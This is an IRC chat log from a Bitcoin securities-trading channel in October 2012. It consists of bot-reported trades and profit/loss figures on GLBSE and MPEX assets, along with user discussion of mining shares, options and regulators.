NYAN.C [1@1BTC] paid: 0.14927771 BTC. Last price: 0.25 BTC. Capital gain: -0.75 BTC. Total: -0.60072229 BTC. (-60.1%) Oct 01 21:43:01 !pl NYAN 1 Oct 01 21:43:01 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:43:13 NYAN [1@1BTC] paid: 0.08033233 BTC. Last price: 0.6 BTC. Capital gain: -0.4 BTC. Total: -0.31966767 BTC. (-32%) Oct 01 21:43:20 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:43:38 BMF [1@0.5BTC] (since: 2012-08-05) paid: 0.07135279 BTC. Last price: 0.40000001 BTC. Capital gain: -0.09999999 BTC. Total: -0.0286472 BTC. (-5.7%) Oct 01 21:44:07 5.7% is also pretty much exactly the movement in BTC isn't it? Oct 01 21:44:34 Valuing shares at NAV regardless of past performance makes me cry Oct 01 21:45:11 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:45:15 ABM [1@0.45BTC] (since: 2012-08-05) paid: 0.015011 BTC. Last price: 0.10000001 BTC. Capital gain: -0.34999999 BTC. Total: -0.33498899 BTC. (-74.4%) Oct 01 21:45:50 !pl NYAN.A 1 Oct 01 21:45:50 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:45:59 NYAN.A [1@1BTC] paid: 0.09 BTC. Last price: 0.99 BTC. Capital gain: -0.01 BTC. Total: 0.08 BTC. (8%) Oct 01 21:45:59 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:46:03 YABMC [1@0.14BTC] (since: 2012-08-05) paid: 0.02337128 BTC. Last price: 0.07034002 BTC. Capital gain: -0.06965998 BTC. Total: -0.0462887 BTC. (-33.1%) Oct 01 21:46:14 I think I'm about 2% down on usagi-related shares, maybe less than that Oct 01 21:46:55 And most of the loss was on YARR (bought at 1.25, returned 1) Oct 01 21:47:30 and about .17 in divs Oct 01 21:48:58 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:49:11 GIGAMINING [1@0.9BTC] (since: 2012-08-05) paid: 0.132775 BTC. Last price: 0.60499997 BTC. Capital gain: -0.29500003 BTC. Total: -0.16222503 BTC. (-18%) Oct 01 21:49:36 1pl dmc 1.0 Oct 01 21:49:37 !pl GIGAMINING 1 Oct 01 21:49:37 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:49:39 GIGAMINING [1@1BTC] paid: 0.48117596 BTC. Last price: 0.60499997 BTC. Capital gain: -0.39500003 BTC. Total: 0.08617593 BTC. (8.6%) Oct 01 21:49:47 !pl dmc 1.0 Oct 01 21:49:47 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:49:55 DMC [1@1BTC] paid: 0.02635814 BTC. Last price: 0.055 BTC. Capital gain: -0.945 BTC. Total: -0.91864186 BTC. (-91.9%) Oct 01 21:49:58 [MPEX] [S.MPOE] 9566 @ 0.00036422 = 3.4841 BTC [+] Oct 01 21:50:00 [MPEX] [S.MPOE] 1100 @ 0.00036605 = 0.4027 BTC [+] Oct 01 21:50:01 [MPEX] [S.MPOE] 10334 @ 0.0003661 = 3.7833 BTC [+] Oct 01 21:50:13 I have some work to do I think Oct 01 21:50:21 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:50:24 DMC [1@0.45BTC] (since: 2012-08-05) paid: 0 BTC. Last price: 0.055 BTC. Capital gain: -0.395 BTC. Total: -0.395 BTC. (-87.8%) Oct 01 21:50:36 whoops Oct 01 21:51:05 usagi: I may continue not paying dividends Oct 01 21:52:07 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:52:13 NYAN.A [1@1BTC] (since: 2012-08-05) paid: 0.09 BTC. Last price: 0.99 BTC. Capital gain: -0.01 BTC. Total: 0.08 BTC. (8%) Oct 01 21:52:19 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:52:20 NYAN.B [1@1BTC] (since: 2012-08-05) paid: 0.16081227 BTC. Last price: 0.96999999 BTC. Capital gain: -0.03000001 BTC. Total: 0.13081226 BTC. (13.1%) Oct 01 21:52:29 http://btctrading.wordpress.com/trade-forex-with-bitcoins/ Oct 01 21:54:19 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:54:30 BMMO [1@0.14BTC] (since: 2012-08-05) paid: 0.01673604 BTC. Last price: 0.04 BTC. Capital gain: -0.1 BTC. Total: -0.08326396 BTC. (-59.5%) Oct 01 22:06:37 good evening fellas Oct 01 22:06:53 kako you there? Oct 01 22:06:59 ya Oct 01 22:07:01 wsell Oct 01 22:07:03 well Oct 01 22:07:04 the page is on Oct 01 22:07:07 ABM [1@0.45BTC] << usagi, explain? Oct 01 22:07:13 already 120 htis Oct 01 22:07:14 hits Oct 01 22:07:18 :)) Oct 01 22:07:22 https://www.youtube.com/watch?feature=player_embedded&v=HmBByDQHJAA Oct 01 22:07:25 all ABM shares sold by me were at .22-.25 Oct 01 22:07:34 sure Oct 01 22:07:43 I f someone is stupid enough to buy Oct 01 22:08:09 ok they dont read the forum then Oct 01 22:08:22 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 22:08:24 ABM [1@0.35BTC] (since: 2012-08-05) paid: 0.015011 BTC. Last price: 0.10000001 BTC. Capital gain: -0.24999999 BTC. Total: -0.23498899 BTC. (-67.1%) Oct 01 22:08:43 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 22:08:46 ABM [1@0.25BTC] (since: 2012-08-05) paid: 0.015011 BTC. Last price: 0.10000001 BTC. Capital gain: -0.14999999 BTC. Total: -0.13498899 BTC. (-54%) Oct 01 22:09:11 but I thought you said mining companies droped 50% but if you had bought ABM in June you had paid .22 and then with a sale at .45 you would gain 110% Oct 01 22:09:36 correct, 105% Oct 01 22:09:52 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 22:10:01 ABM [1@0.2BTC] (since: 2012-08-05) paid: 0.015011 BTC. Last price: 0.10000001 BTC. Capital gain: -0.09999999 BTC. Total: -0.08498899 BTC. (-42.5%) Oct 01 22:10:22 last price sure, low volume stock ;) Oct 01 22:15:19 [MPEX] [F.GIGA.ETF] 7000 @ 0.00044183 = 3.0928 BTC [-] Oct 01 22:16:34 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 22:16:48 BMF [1@0.5BTC] (since: 2012-08-05) paid: 0.07135279 BTC. Last price: 0.40000001 BTC. Capital gain: -0.09999999 BTC. Total: -0.0286472 BTC. (-5.7%) Oct 01 22:22:52 [GLBSE] [OBSI.HRPT] 1 @ 0.02069624 BTC [+] Oct 01 22:22:54 [GLBSE] [OBSI.HRPT] 1 @ 0.02899999 BTC [+] Oct 01 22:22:55 [GLBSE] [OBSI.HRPT] 100 @ 0.029 = 2.9 BTC [+] Oct 01 22:22:56 [GLBSE] [OBSI.HRPT] 4 @ 0.02918169 = 0.1167 BTC [+] Oct 01 22:22:58 [GLBSE] [OBSI.HRPT] 10 @ 0.0299995 = 0.3 BTC [+] Oct 01 22:22:59 [GLBSE] [OBSI.HRPT] 50 @ 0.0299995 = 1.5 BTC [+] Oct 01 22:23:00 [GLBSE] [OBSI.HRPT] 372 @ 0.03 = 11.16 BTC [+] Oct 01 22:23:00 [GLBSE] [OBSI.HRPT] 2 @ 0.03 = 0.06 BTC [+] Oct 01 22:23:01 [GLBSE] [OBSI.HRPT] 9 @ 0.03798 = 0.3418 BTC [+] Oct 01 22:23:03 [GLBSE] [OBSI.HRPT] 469 @ 0.03799 = 17.8173 BTC [+] Oct 01 22:23:04 [GLBSE] [OBSI.HRPT] 32 @ 0.038 = 1.216 BTC [+] Oct 01 22:34:37 EskimoBob, probably because the mining companies have a large profit and sell fixed mhash/s bond. The bonds lose value and so do the investors, but the company does not. Oct 01 22:35:04 and for the few actual companies, they have GPU. Untransferable to FPGA/ASIC. Oct 01 22:35:13 They'd have to sell GPUs at a loss. Oct 01 22:35:21 [GLBSE] [OBSI.HRPT] 2 @ 0.01902 = 0.038 BTC [-] Oct 01 22:35:23 [GLBSE] [OBSI.HRPT] 10 @ 0.019 = 0.19 BTC [-] Oct 01 22:35:23 [GLBSE] [OBSI.HRPT] 1 @ 0.018 BTC [-] Oct 01 22:35:25 [GLBSE] [OBSI.HRPT] 20 @ 0.01702 = 0.3404 BTC [-] Oct 01 22:35:26 [GLBSE] [OBSI.HRPT] 100 @ 0.017 = 1.7 BTC [-] Oct 01 22:35:27 [GLBSE] [OBSI.HRPT] 2 @ 0.01502 = 0.03 BTC [-] Oct 01 22:35:28 [GLBSE] [OBSI.HRPT] 1 @ 0.01189875 BTC [-] Oct 01 22:35:30 [GLBSE] [OBSI.HRPT] 1 @ 0.0113467 BTC [-] Oct 01 22:35:31 [GLBSE] [OBSI.HRPT] 4 @ 0.01004 = 0.0402 BTC [-] Oct 01 22:35:32 [GLBSE] [OBSI.HRPT] 20 @ 0.01002001 = 0.2004 BTC [-] Oct 01 22:35:32 [GLBSE] [OBSI.HRPT] 1 @ 0.01002 BTC [-] Oct 01 22:35:33 [GLBSE] [OBSI.HRPT] 5 @ 0.01 = 0.05 BTC [-] Oct 01 22:35:34 [GLBSE] [OBSI.HRPT] 40 @ 0.01 = 0.4 BTC [-] Oct 01 22:35:35 [GLBSE] [OBSI.HRPT] 1 @ 0.00945546 BTC [-] Oct 01 22:35:37 [GLBSE] [OBSI.HRPT] 2 @ 0.00795903 = 0.0159 BTC [-] Oct 01 22:35:38 [GLBSE] [OBSI.HRPT] 100 @ 0.007 = 0.7 BTC [-] Oct 01 22:35:39 [GLBSE] [OBSI.HRPT] 100 @ 0.006102 = 0.6102 BTC [-] Oct 01 22:35:40 [GLBSE] [OBSI.HRPT] 48 @ 0.00514864 = 0.2471 BTC [-] Oct 01 22:35:41 [GLBSE] [OBSI.HRPT] 6 @ 0.00456759 = 0.0274 BTC [-] Oct 01 22:35:41 [GLBSE] [OBSI.HRPT] 96 @ 0.00232906 = 0.2236 BTC [-] Oct 01 22:35:42 [GLBSE] [OBSI.HRPT] 100 @ 0.002 = 0.2 BTC [-] Oct 01 22:35:43 [GLBSE] [OBSI.HRPT] 140 @ 0.00194476 = 0.2723 BTC [-] Oct 01 22:36:04 [GLBSE] [GIGAMINING] 1 @ 0.5601 BTC [-] Oct 01 22:36:05 [GLBSE] [GIGAMINING] 1 @ 0.56 BTC [-] Oct 01 22:36:07 [GLBSE] [GIGAMINING] 1 @ 0.5564 BTC [-] Oct 01 22:36:08 [GLBSE] [GIGAMINING] 8 @ 0.5563 = 4.4504 BTC [-] Oct 01 22:36:09 [GLBSE] [GIGAMINING] 4 @ 0.5562 = 2.2248 BTC [-] Oct 01 22:36:10 [GLBSE] [GIGAMINING] 2 @ 0.556001 = 1.112 BTC [-] Oct 01 22:36:36 [GLBSE] [OBSI.HRPT] 52 @ 0.00194476 = 0.1011 BTC [-] Oct 01 22:37:38 [GLBSE] [GIGAMINING] 3 @ 0.556 = 1.668 BTC [-] Oct 01 22:38:58 [GLBSE] [OBSI.HRPT] 198 @ 0.01 = 1.98 BTC [+] Oct 01 22:40:27 [MPEX] [S.MPOE] 36900 @ 0.00036578 = 13.4973 BTC [-] Oct 01 22:41:24 Hopefully if he switches to being a mining company, he'll stop losing so much. Oct 01 22:41:49 Mining bonds devalue too much Oct 01 22:43:47 [GLBSE] [HYDRO.BONDS] 4 @ 1.4 = 5.6 BTC [-] Oct 01 22:46:30 usagi: lol Oct 01 22:58:20 [GLBSE] [BDK.BND] 34 @ 0.02502 = 0.8507 BTC [+] Oct 01 22:58:22 [GLBSE] [BDK.BND] 2 @ 0.02501 = 0.05 BTC [-] Oct 01 22:58:23 [GLBSE] [BDK.BND] 54 @ 0.025 = 1.35 BTC [-] Oct 01 22:59:29 LIke we have 210 shares of ABM. That's 21% of the company o_o << your my bigest share holdert Oct 01 22:59:34 -t Oct 01 23:00:09 [GLBSE] [BITBOND] 1 @ 0.17500001 BTC [-] Oct 01 23:00:11 [GLBSE] [BITBOND] 2 @ 0.175 = 0.35 BTC [-] Oct 01 23:00:24 deadterra owns ~50 ABM Oct 01 23:00:49 I know my shareholders ;) Oct 01 23:01:01 most of them Oct 01 23:01:18 [GLBSE] [BITBOND] 1 @ 0.175 BTC [-] Oct 01 23:02:14 not atm Oct 01 23:02:38 I cant get a decent price p share atm Oct 01 23:03:07 I own 6 singles total 1 is owned by ABM Oct 01 23:03:28 4 ztex quads Oct 01 23:03:35 1 x5000 fpga Oct 01 23:03:43 and lots of GPU`s Oct 01 23:04:17 only gpu is going down after block cut Oct 01 23:05:31 [MPEX] [S.MPOE] 45330 @ 0.0003661 = 16.5953 BTC [+] Oct 01 23:06:05 lets see what happens after block cut and asics, then I will decide what to do with ABM Oct 01 23:06:25 [GLBSE] [ASICMINER] 2 @ 0.106 = 0.212 BTC [-] Oct 01 23:06:27 [GLBSE] [ASICMINER] 1 @ 0.10551 BTC [-] Oct 01 23:06:28 [GLBSE] [ASICMINER] 10 @ 0.1055 = 1.055 BTC [-] Oct 01 23:06:55 [GLBSE] [NASTY] 2 @ 0.45389987 = 0.9078 BTC [-] Oct 01 23:06:57 [GLBSE] [NASTY] 1 @ 0.45389999 BTC [+] Oct 01 23:07:46 [GLBSE] [ASICMINER] 10 @ 0.1055 = 1.055 BTC [-] Oct 01 23:07:53 no I am concentrating on FDBF Oct 01 23:08:09 [GLBSE] [NASTY] 3 @ 0.4539 = 1.3617 BTC [+] Oct 01 23:08:18 now* Oct 01 23:10:23 [GLBSE] [ASICMINER] 5 @ 0.1055 = 0.5275 BTC [-] Oct 01 23:10:52 [GLBSE] [NASTY] 1 @ 0.4539 BTC [+] Oct 01 23:16:29 Great. I rolled back my driver on my wifi card and my connection stopped being slow. Oct 01 23:29:27 Oh lord, some kids are gonna blow up their bitcoin account... http://bit4x.com Available leverages: 1:1, 2, 5, 10, 20, 25, 33, 50, 66, 75, 100, 125, 150, 200, 300, 400, 500, 1000 Oct 01 23:30:45 [MPEX] [S.MPOE] 11636 @ 0.0003661 = 4.2599 BTC [+] Oct 01 23:33:28 i warn not to do it. Oct 01 23:33:59 [MPEX] [S.DICE] 10092 @ 0.0034 = 34.3128 BTC [+] Oct 01 23:34:42 [GLBSE] [GOLD] 50 @ 0.00999999 = 0.5 BTC [+] Oct 01 23:35:21 looks cool though! I don't have the desire to get my dick chopped off trading forex again though. Oct 01 23:36:44 [MPEX] [S.DICE] 90829 @ 0.0034 = 308.8186 BTC [+] Oct 01 23:36:55 oh my Oct 01 23:37:08 people gettin' on the S.DICE train Oct 01 23:37:13 whoo whoo Oct 01 23:41:50 Wow Oct 01 23:44:49 If all mining assets lost money does that mean prfoably miners in general have all been losing money or just that mining assets are scams set up to scam investors but make profit for the actual miner offering the asset? Oct 01 23:45:04 s/prfoably/probably/ Oct 01 23:45:14 they're not scams Oct 01 23:45:23 they just aren't a particularly good investment Oct 01 23:45:39 no it means the share price is falling to the expected future payout amount Oct 01 23:45:42 oh ok s/scams/naive pipe dreams/ Oct 01 23:45:48 share prices mean nothing on glbse Oct 01 23:45:52 Well, it all depend how you look at them Oct 01 23:45:56 I think that most of the mining companies are good in configuring computers, but not at all to make a strategy / business plan. Oct 01 23:45:59 that doesn't mean people don't take them seriously though Oct 01 23:46:21 so in a perverse sense, they mean more because of it Oct 01 23:46:23 If nobody is mining, and we aren't financing mining, there's no bitcoin Oct 01 23:46:25 with reward halving coming and difficulty ramping, people are realizing that there won't be that much in dividends coming out in a few months Oct 01 23:46:31 if done the right way, mining is very profitable. But all or almost all the mining companies are losing... Oct 01 23:46:37 its hard to believe they are serious if they don't even merged mine as they thus deliberately leave money on the table Oct 01 23:46:41 gigamining is a winner Oct 01 23:46:47 example: pyramining is going strong Oct 01 23:46:48 the only winner I can see Oct 01 23:46:51 what did i do now Oct 01 23:47:03 and maybe gigamining, which I don't know very very well.. Oct 01 23:47:37 just do the math on the hash rate and their equipment and some expected future growth curves Oct 01 23:47:44 or do they do like some pools and simply keep their merded mined coins to their own private purses? Oct 01 23:47:52 most mining companies are still overvalued Oct 01 23:47:57 s/merded/merged/ Oct 01 23:48:06 Bugpowder, don't forget Oct 01 23:48:12 !pl BTC-MINING 1 Oct 01 23:48:12 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 23:48:31 BTC-MINING [1@1BTC] paid: 0.27012647 BTC. Last price: 0.921 BTC. Capital gain: -0.079 BTC. Total: 0.19112647 BTC. (19.1%) Oct 01 23:48:35 Whoever gets their asics first though... that will be the big winner Oct 01 23:48:51 isnt' BTC-MINING not mining yet ? Oct 01 23:49:11 having a very short period of quite high income doesn't mean it's a win Oct 01 23:49:15 the win is in long term Oct 01 23:49:20 no Oct 01 23:49:25 the win is in getting your money Oct 01 23:49:29 back out Oct 01 23:49:39 that it's normal, not a win Oct 01 23:49:40 sonner the better Oct 01 23:49:55 If you get asics first Oct 01 23:50:02 who gets asic first? Oct 01 23:50:03 aye, not mining yet Oct 01 23:50:04 you could be paying 25% divvy a week Oct 01 23:50:09 in a good business plan even when you get asics last, you win.... Oct 01 23:50:09 till others get them Oct 01 23:50:20 Anyway, you bought the stock with a BTC which was worth half what is worth now Oct 01 23:50:26 agath, sometimes the only way to win is not to play Oct 01 23:50:43 if you are getting in line for BFL now, I think you are totally fucked Oct 01 23:50:45 I'm playing and so far winning, without needing strategies like "first asic out" Oct 01 23:50:51 but thats just my opinion Oct 01 23:50:59 If you would have not inested, it won't have apreciated Oct 01 23:51:01 who cares for BFL? Oct 01 23:51:21 agath noone Oct 01 23:51:33 s/inested/invested/ Oct 01 23:51:49 wait, isn't pyramining a ponzi scheme though? Oct 01 23:51:58 it isn't... read better Oct 01 23:51:58 or MLM scheme Oct 01 23:52:52 so considering that the SEC used #bitcoin-otc to get emails for BTCST, it's very likely that they're in this channel right now Oct 01 23:54:03 SEC should focus on major crimes... BOA, WFC, JPM. Oct 01 23:54:17 is it mining a crime? Oct 01 23:54:28 Countrywide Oct 01 23:54:43 novusordo: unlikely Oct 01 23:54:53 what's more likely is someone who's mad gave them all the info Oct 01 23:54:56 Angelo Mozilo Oct 01 23:55:24 Angelo Mozilo seems the name of an italian made browser Oct 01 23:55:34 On Friday October 15, 2010, Mozilo reached a settlement with Securities and Exchange Commission, over securities fraud and insider trading charges. Mozilo agreed to pay $67.5 million in fines Oct 01 23:55:46 This fine represents a small fraction of Mozilo's estimated net worth of $600 million. Countrywide will pay $20 million of the $67.5 million penalty because of an indemnification agreement that was part of Mozillo's employment contract. Oct 01 23:55:51 FUCK that Oct 01 23:56:34 what is the point of the SEC if you aren't going to lock the real fuckers up Oct 01 23:58:10 usigi, NYAN.B closing? Oct 01 23:58:15 usagi Oct 01 23:59:31 ok, isnt it an option to get rid of move.to and add another asset to its portfolio? Oct 02 00:00:35 [GLBSE] [OBSI.HRPT] 50 @ 0.03 = 1.5 BTC [+] Oct 02 00:01:38 ok so then I dont get the problem you closing due to move.to Oct 02 00:01:52 [MPEX] [S.MPOE] 29700 @ 0.00036653 = 10.8859 BTC [+] Oct 02 00:02:13 so you just want to get out Oct 02 00:02:25 ok clear Oct 02 00:03:45 [GLBSE] [GSDPT] 5 @ 0.0035 = 0.0175 BTC [-] Oct 02 00:04:49 [GLBSE] [GSDPT] 5 @ 0.0035 = 0.0175 BTC [-] Oct 02 00:06:28 [GLBSE] [BITBOND] 1 @ 0.24989966 BTC [+] Oct 02 00:07:07 usagi: FUTUREFUND is worth 0 Oct 02 00:07:35 it was closed out and delisted, can't be traded from what I know Oct 02 00:10:34 [GLBSE] [BDK.BND] 22 @ 0.02502 = 0.5504 BTC [+] Oct 02 00:11:01 [GLBSE] [OBSI.HRPT] 2 @ 0.0109 = 0.0218 BTC [-] Oct 02 00:13:39 !ticker B.MPCD.B Oct 02 00:13:44 [MPEX:B.MPCD.B] 1day: 0.00099998 / 0.00100051 / 0.00100157 (60000 shares, 60.03 BTC), 30day: 0.00099998 / 0.00101132 / 0.00102622 (504009 shares, 509.72 BTC) Oct 02 00:15:33 [GLBSE] [BDK.BND] 1 @ 0.02502 BTC [+] Oct 02 00:15:35 [GLBSE] [BDK.BND] 21 @ 0.025 = 0.525 BTC [-] Oct 02 00:21:00 [GLBSE] [OBSI.HRPT] 2 @ 0.01100001 = 0.022 BTC [+] Oct 02 00:21:02 [GLBSE] [OBSI.HRPT] 4 @ 0.011 = 0.044 BTC [-] Oct 02 00:25:20 how so? Oct 02 00:25:56 Starfish defaulted too? Oct 02 00:26:55 Or are you talking about BDK? Oct 02 00:27:06 starfish reduced interest rate Oct 02 00:27:17 Yeah, long ago Oct 02 00:27:30 [MPEX] [S.MPOE] 17700 @ 0.00036629 = 6.4833 BTC [-] Oct 02 00:27:33 [GLBSE] [OBSI.HRPT] 66 @ 0.011 = 0.726 BTC [-] Oct 02 00:27:35 How is that a default? Oct 02 00:27:53 And is slowly repaying withdrawals Oct 02 00:28:32 it was totally undervalued Oct 02 00:29:03 because people can show problems with your accounting? Oct 02 00:29:13 because you play weird identity games? Oct 02 00:29:15 Erhm, you're not a deposit taker as far as I know? Oct 02 00:29:38 So how is that relevent? Other than deposit takes, plenty are not defaulting. Oct 02 00:31:42 Are puts and calls both actually the exact same thing with the pair reversed? So e.g. a USD/BTC put is equally referrable to as a BTC/USD call? Oct 02 00:31:51 [17:29] lolz dub, people who don't understand accrual or cost basis accounting should be banned from the forums Oct 02 00:31:58 Isn't it you who claims all stock markets are a zero/negative sum game? Oct 02 00:33:00 I am windering because if so, coding need not code two separate strategies one to offer puts one to offer calls, instead just reversing the pair the exact same code could be used Oct 02 00:33:06 s/windering/wondering/ Oct 02 00:33:39 knotwork, I am unsure what you mean but... Oct 02 00:34:42 with calls, the lower under the stock price it goes, the better, opposite for puts. Oct 02 00:34:52 well if you obligate me to buy X at a cetrain price as denominated in Y, isnt that the same as obligating me to sell Y to you at a certain price denominated in X ? Oct 02 00:34:55 stock > struck* Oct 02 00:36:00 Hmm... formula for call is (Current price - Struck price)/current price Oct 02 00:36:22 BTC-Mining well for eample if you buy from me a put entitling you to put 10 IBM for 1 AAPL on certain date, isnt that the same as buying a call entitling you to buy 1 AAPL for 10 IBM at that same date? Oct 02 00:37:07 Is it for MPEx? Oct 02 00:37:16 or if you but a put entitling you to sell me 12 dollars for 1 bitcoin on a certain date, isnt that identical to buying a call entitling you to buy 1 bitcoin from me for 12 dollars on that date? Oct 02 00:37:37 no this is generically for code to handle puts and calls of any X priced in terms of any Y Oct 02 00:38:17 I'd guess but... ask mircea_popescu Oct 02 00:38:23 He knows about options Oct 02 00:38:23 it seems to me at a glance that a put to sell X for a price in Y is identical to a call to buy Y at a price in X Oct 02 00:38:33 and it doesn't seem to work that way. Oct 02 00:39:09 I suspect favourite/local currency preference is only reason it does not work that way most places Oct 02 00:39:44 since most places have one asset they think of as "money" and all other assets are "commodities" or "foreign currencies" to buy and sell with prices expressed in the "local favourite" Oct 02 00:40:23 but if you are agnostic about assets, as Open Transactions is, any asset can be used to buy any other asset Oct 02 00:40:48 no forcing people to do two trades, one from asset A into local currency asset then another to buy asset B with that local currency Oct 02 00:41:00 Example, if I buy a call option struck at 1 USD/BTC and the price is currently 12 USD/BTC when redeemed, the redeem value is (12 - 1)/12 = 0.91666667 BTC Oct 02 00:41:01 instead just directly offer a price for B expressed in A Oct 02 00:41:22 Which is confusing me because that's now how I understood options but anyway. Oct 02 00:42:03 I suspect a big reason for intruding local currency between all assets is simply to double the fees Oct 02 00:42:37 since the house takes a fee on each trade, they prefer you sell A for local currency paying a fee then buy B paying a fee instead of just trading A for B Oct 02 00:43:07 also of course they like the fee to be in local currency maybe not some tiny bit of A and/or B neither of which they may be particularly fond of Oct 02 00:43:46 [GLBSE] [RSM] 1 @ 0.2726 BTC [-] Oct 02 00:43:46 [GLBSE] [RSM] 1 @ 0.2725 BTC [-] Oct 02 00:43:48 [GLBSE] [RSM] 5 @ 0.272 = 1.36 BTC [-] Oct 02 00:43:49 [GLBSE] [RSM] 2 @ 0.27 = 0.54 BTC [-] Oct 02 00:43:50 [GLBSE] [RSM] 2 @ 0.267 = 0.534 BTC [-] Oct 02 00:43:51 [GLBSE] [RSM] 10 @ 0.263 = 2.63 BTC [-] Oct 02 00:43:53 [GLBSE] [RSM] 5 @ 0.262 = 1.31 BTC [-] Oct 02 00:43:58 I am actually surprised that just the lack of percentage fees in Open Transactions isnt causing customers to be pressing hard for development of the clients to make it easier for them to take advantage of the lack of percentage fees on all trades Oct 02 00:44:09 great I cannot sell anything on MPEX Oct 02 00:44:20 wtf Oct 02 00:47:54 can anyone execute a sell order on MPEX right now? Oct 02 00:47:58 single share? Oct 02 00:49:48 What do I know Oct 02 00:50:53 Can anyone else sell a share on MPEX? I'm getting an 'insufficient funds' message. Oct 02 00:51:07 do you uh... have funds in it Oct 02 00:51:13 yes Oct 02 00:51:33 I have shares. Can't sell a single share of any asset Oct 02 00:51:42 though I only have .0007 BTC in account Oct 02 00:51:44 Check your STAT. Oct 02 00:51:54 but that should still be enough to pay for it Oct 02 00:52:12 STAT is fine Oct 02 00:52:15 you still might have to cover a trade fee Oct 02 00:52:20 ? ask mp Oct 02 00:52:33 seems afk Oct 02 00:52:36 [MPEX] [F.GIGA.ETF] 2500 @ 0.00044183 = 1.1046 BTC [-] Oct 02 00:52:38 [MPEX] [F.GIGA.ETF] 5200 @ 0.00044183 = 2.2975 BTC [-] Oct 02 00:52:41 well Oct 02 00:52:43 then Oct 02 00:52:47 somebody can Oct 02 00:52:50 so it can cover a 0.35 sale. Guess that's enough for almost anything Oct 02 00:52:57 No clue Oct 02 00:59:16 [GLBSE] [BMF] 1 @ 0.48999996 BTC [+] Oct 02 01:11:53 [GLBSE] [ASICMINER] 13 @ 0.1099999 = 1.43 BTC [+] Oct 02 01:18:02 [MPEX] [F.GIGA.ETF] 400 @ 0.00044183 = 0.1767 BTC [-] Oct 02 01:18:04 [MPEX] [F.GIGA.ETF] 4211 @ 0.00044183 = 1.8605 BTC [-] Oct 02 01:18:05 [MPEX] [F.GIGA.ETF] 3200 @ 0.00044183 = 1.4139 BTC [-] Oct 02 01:20:05 jesus H crimminey christ in a crimson cabriolet, its international blasphemy day Oct 02 01:21:46 [GLBSE] [BDK.BND] 9 @ 0.02502 = 0.2252 BTC [+] Oct 02 01:21:47 [GLBSE] [BDK.BND] 96 @ 0.025 = 2.4 BTC [-] Oct 02 01:21:48 [GLBSE] [BDK.BND] 95 @ 0.01253 = 1.1904 BTC [-] Oct 02 01:26:15 [GLBSE] [GSDPT] 200 @ 0.003799 = 0.7598 BTC [+] Oct 02 01:28:24 [GLBSE] [GMVT-BOT] 1 @ 0.13999898 BTC [+] Oct 02 01:28:26 [GLBSE] [GMVT-BOT] 19 @ 0.13999899 = 2.66 BTC [+] Oct 02 01:31:14 [GLBSE] [NASTY] 6 @ 0.4539 = 2.7234 BTC [+] Oct 02 01:41:26 WELL THEN - http://finance.yahoo.com/news/jpmorgan-sued-york-over-mortgage-221510528.html Oct 02 01:41:46 Since the SEC has no balls, glad Schneiderman does Oct 02 01:42:14 [GLBSE] [BFLS.RIG] 1 @ 0.88799999 BTC [+] Oct 02 01:42:15 [GLBSE] [BFLS.RIG] 2 @ 0.888 = 1.776 BTC [+] Oct 02 01:42:17 [GLBSE] [BFLS.RIG] 3 @ 0.8989 = 2.6967 BTC [+] Oct 02 01:43:08 [MPEX] [S.MPOE] 28264 @ 0.00036629 = 10.3528 BTC [-] Oct 02 01:43:10 [MPEX] [S.MPOE] 22000 @ 0.00036578 = 8.0472 BTC [-] Oct 02 01:43:11 [MPEX] [S.MPOE] 18371 @ 0.00036546 = 6.7139 BTC [-] Oct 02 01:43:49 [GLBSE] [BIB.BVPS] 10 @ 0.00389 = 0.0389 BTC [-] Oct 02 01:47:33 [GLBSE] [BMF] 1 @ 0.40100001 BTC [-] Oct 02 02:08:46 [MPEX] [S.MPOE] 27000 @ 0.00036653 = 9.8963 BTC [+] Oct 02 02:08:47 [MPEX] [S.MPOE] 30626 @ 0.00036664 = 11.2287 BTC [+] Oct 02 02:08:49 [MPEX] [S.MPOE] 6374 @ 0.0003671 = 2.3399 BTC [+] Oct 02 02:15:14 [GLBSE] [SILVER] 1 @ 0.00999998 BTC [+] Oct 02 02:22:02 [GLBSE] [ASICMINER] 5 @ 0.10810001 = 0.5405 BTC [-] Oct 02 02:23:29 [GLBSE] [ASICMINER] 9 @ 0.1081 = 0.9729 BTC [-] Oct 02 02:25:04 [GLBSE] [ASICMINER] 2 @ 0.10706 = 0.2141 BTC [-] Oct 02 02:27:11 [GLBSE] [ASICMINER] 3 @ 0.1061 = 0.3183 BTC [-] Oct 02 02:31:03 [GLBSE] [ASICMINER] 7 @ 0.1061 = 0.7427 BTC [-] Oct 02 02:32:16 [GLBSE] [ASICMINER] 10 @ 0.106 = 1.06 BTC [-] Oct 02 02:33:58 [MPEX] [F.GIGA.ETF] 9497 @ 0.00044184 = 4.1962 BTC [+] Oct 02 02:34:00 [MPEX] [F.GIGA.ETF] 1003 @ 0.00044184 = 0.4432 BTC [+] Oct 02 02:34:31 [GLBSE] [ASICMINER] 3 @ 0.105001 = 0.315 BTC [-] Oct 02 02:42:05 [GLBSE] [SYNERGY] 2 @ 0.08 = 0.16 BTC [-] Oct 02 02:44:39 [GLBSE] [GOLD] 1 @ 0.0095 BTC [-] Oct 02 02:44:41 [GLBSE] [GOLD] 17 @ 0.00920001 = 0.1564 BTC [-] Oct 02 02:45:55 [GLBSE] [MU] 1 @ 